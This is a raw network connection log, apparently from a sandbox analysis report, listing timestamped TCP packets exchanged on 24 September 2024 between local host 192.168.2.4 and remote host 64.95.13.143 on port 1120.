Sep 24, 2024 17:46:12.132694960 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.132699966 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.132714033 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.132746935 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.133120060 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.133126020 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.133136034 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.133141994 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.133152008 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.133157969 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.133164883 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.133169889 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.133178949 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.133191109 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.133213043 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.191380024 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.191420078 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.191435099 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.191446066 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.191452026 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.191457033 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.191462994 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.191484928 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.191541910 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.191636086 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.191692114 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.217201948 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.217212915 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.217220068 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.217266083 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.217456102 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.217462063 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.217473030 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.217478991 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.217556000 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.219846010 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.219960928 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.219980955 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.219990015 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.220004082 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.220011950 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.220020056 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.220047951 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.220066071 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.220284939 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.220292091 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.220304012 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.220310926 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.220335960 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.220347881 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.220563889 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.220580101 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.220594883 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.220602989 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.220629930 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.220653057 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.220849037 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.220858097 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.220905066 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.221112013 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.221120119 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.221124887 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.221132040 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.221144915 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.221153021 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.221163988 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.221174002 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.221180916 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.221193075 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.221201897 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.221209049 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.221220970 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.221230984 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.221247911 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.222074986 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.222080946 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.222094059 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.222100019 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.222105980 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.222111940 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.222121954 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.222132921 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.222141027 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.222150087 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.222188950 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.222198009 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.222208023 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.222227097 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.222244978 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.223047972 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.223056078 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.223067999 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.223074913 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.223083019 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.223095894 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.223102093 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.223112106 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.223121881 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.223124027 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.223134041 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.223144054 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.223150015 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.223156929 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.223165989 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.223187923 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.223851919 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.223906994 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.224008083 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.224014997 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.224028111 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.224034071 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.224045992 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.224051952 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.224060059 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.224071980 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.224077940 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.224092007 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.224097967 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.224104881 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.224124908 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.224153996 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.225028992 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.225035906 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.225048065 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.225054026 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.225060940 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.225075006 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.225081921 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.225089073 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.225095987 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.225107908 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.225116014 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.225122929 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.225131035 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.225136042 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.225146055 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.225167036 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.225188971 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.225707054 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.225723028 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.225733995 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.225739956 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.225747108 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.225753069 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.225765944 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.225771904 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.225781918 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.225789070 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.225801945 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.225807905 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.225825071 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.225857019 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.226274014 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.226284027 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.226303101 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.226315022 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.226321936 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.226336002 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.226341963 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.226356030 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.226361036 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.226371050 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.226386070 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.226404905 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.226727962 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.226733923 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.226747990 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.226753950 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.226759911 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.226777077 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.226779938 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.226790905 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.226800919 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.226809978 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.226830006 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.226851940 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.284970999 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.284986973 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.285001040 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.285007000 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.285013914 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.285021067 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.285034895 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.285106897 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.285140991 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.309581995 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.309595108 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.309609890 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.309689045 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.309696913 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.309703112 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.309722900 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.309731960 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.309741020 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.309789896 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.312664032 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.312694073 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.312695980 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.312702894 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.312711954 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.312720060 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.312736034 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.312748909 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.312783003 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.312911034 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.312917948 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.312931061 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.312938929 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.312946081 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.312957048 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.312984943 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.313215017 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.313221931 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.313258886 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.313282013 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.313290119 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.313294888 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.313302040 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.313308954 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.313322067 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.313332081 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.313338995 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.313348055 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.313359976 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.313374996 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.313394070 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.313949108 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.313955069 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.313967943 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.313973904 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.313982010 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.313997984 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.313999891 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.314030886 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.314058065 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.314471006 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.314483881 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.314490080 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.314496994 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.314512968 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.314517975 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.314532995 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.314546108 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.314552069 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.314562082 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.314573050 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.314574957 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.314584970 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.314598083 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.314605951 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.314615011 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.314624071 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.314656973 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.315366030 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.315373898 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.315397978 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.315403938 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.315418959 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.315422058 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.315433025 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.315438986 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.315448046 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.315454960 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.315464973 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.315474987 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.315483093 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.315494061 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.315504074 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.315511942 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.315521002 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.315531969 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.315551996 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.316265106 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.316277981 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.316283941 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.316293955 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.316304922 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.316307068 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.316318035 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.316323996 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.316329956 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.316344976 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.316355944 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.316361904 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.316370010 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.316387892 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.316390038 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.316401005 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.316407919 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.316425085 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.317020893 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.317033052 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.317039967 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.317045927 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.317063093 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.317071915 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.317080021 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.317080021 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.317090034 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.317097902 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.317111015 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.317117929 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.317127943 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.317137003 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.317147017 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.317156076 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.317164898 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.317176104 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.317184925 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.317195892 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.317220926 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.317630053 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.317635059 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.317646027 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.317651987 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.317677975 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.317688942 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.317882061 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.317898989 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.317912102 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.317918062 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.317931890 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.317939997 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:12.317950964 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.317960978 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:12.317970991 CEST	49730	1120	192.168.2.4	64.95.13.143
